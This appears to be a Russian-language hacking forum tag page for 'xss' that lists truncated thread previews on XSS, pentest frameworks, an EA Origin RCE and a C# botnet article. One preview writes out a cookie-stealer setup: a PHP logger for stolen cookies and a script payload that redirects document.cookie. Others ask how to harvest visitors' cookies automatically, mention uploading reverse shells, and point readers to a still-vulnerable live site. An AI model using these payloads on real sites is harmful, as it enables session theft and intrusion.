xss

На сайте все еще не прикрыли уязвимости, так что вы сможете увидеть и потрогать их "вживую" - You must be registered for see element.. Рассказываю я о них потому, что владелец не захотел нормально общаться, сначала заигнорив на почте, а потом и вовсе добавив меня в ЧС во ВКонтакте, ссылаясь на...

Как многие читающие, наверняка, знают, в середине апреля 2019 года была обнаружена уязвимость удаленного выполнения кода в клиенте EA Origin (CVE-2019-11354). О ней и некоторых других багах, @zer0pwn с другом @Daley решили рассказать на страницах своего блога. You must be registered for see...

Добрый день. Решил взглянуть что там, на соседнем борде творится. Пролистал несколько страниц разных статей, и случайно увидел тему "Simple Botnet на C# — Часть 1". Эти статьи я писал еще где-то 5 месяцев назад. В теме есть все три части этой статьи. Как то не по себе, что наши премиум-статьи...

XSStrike - это пакет обнаружения межсайтовых сценариев, оснащенный четырьмя рукописными анализаторами, интеллектуальным генератором полезной нагрузки, мощным механизмом фаззинга и невероятно быстрым сканером. Самый передовой XSS Detection Suite: XSStrike Вместо того, чтобы вводить полезные...

Поднял сайт. Возможно ли в автоматическом режиме получать все куки браузера посетителя сайта? Что то такое делает BeFF, но там все нужно делать ручками. А как автоматизировать - я что то не сообразил (. Есть ли подобное в Метасплойте? Или подскажите фреймворк для таких целей. По рассказам...

You must be registered for see element. Межсайтовый скриптинг (XSS) - одна из самых распространенных уязвимостей, которую можно обнаружить чуть ли не на любом сайте в сети интернет (на некоторых, вроде Google и Amazon, придется хорошо поискать - в этих компаниях работают много разработчиков с...

Есть api на Swager 2.0 You must be registered for see element. как можно реализовать XSS атак и защиту? Пример реализации атаки You must be registered for see element.

Всем салют, вот наткнулся сегодня случайно на игру от компании Google, которая позволяет потренировать свои навыки работы с приложениями, которые не достаточно качественно фильтруют пользовательский ввод, в следствии чего появляется возможность выполнения кода не предусмотренного логикой...

Получается вот такой пэйлод, как избавиться от символа "]", чтобы всё отработало? <textarea name="subscribe"> my_payload - пользовательские данные:

You must be registered for see element. Добрый день,Уважаемые Форумчане и Друзья. Сегодня рассмотрим в работе инструмент,созданный jaxBCD Это г.Сурабая индонезийского острова Ява. Zeebsploit Framework-web scanner с возможностью тестировать ресурс на уязвимости SQL,LFI,XSS. Функционал с...

You must be registered for see element. Добрый день,Уважаемые Жители Форума,Друзья и Читатели. В эти выходные довелось провести тест одного ресурса. Как-то убежал из вида при этом интересный инструмент для проведения pentest. Восполняю пробел,так сказать. Создал софт Lucifer1993 - это мощная...

Это аналог статьи «You must be registered for see element.», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является You must be registered...

Всем доброго времени суток! Еще давно наблюдал данный контент и как то было лень опровергать это, да и времени не было, а вот сейчас призадумался, не пи#%шь ли это? (сразу вспомнил шоу идиоты на карамба тв :D) Так вот суть: "Каратель шк" ищет на серверах (кс-го) школьников которые хотят обмануть...

Начал изучать xss. Сразу появился вопрос. Если ресурс уязвим к данной атаке, можно ли с помощью этой уязвимости, загрузить на атакуемый сервер payload и получить доступ к серверу?

You must be registered for see element. Добрый вечер,Уважаемые Форумчане и Друзья. Сегодня вам хочу представить интересный небольшой framework. Создателем этого замечательного инструмента является Bahaabdelwahed. Арабская школа пентеста. В killshot входят многие модули расположенные для...

Всякий раз, когда я вижу форму загрузки файла во время теста , я обращаю на это внимание. В лучшем случае я могу загрузить обратную оболочку(shell) на языке сценариев, доступном на веб-сервере. Если приложение работает например на PHP или ASP, это становится довольно легко. Если я не могу...

Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...

Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным).You must be registered for see element. Так вот при создании новости на сайте, можно внедрить свой ява-скрипт...

Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...

Статья для участия в You must be registered for see element.на codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения...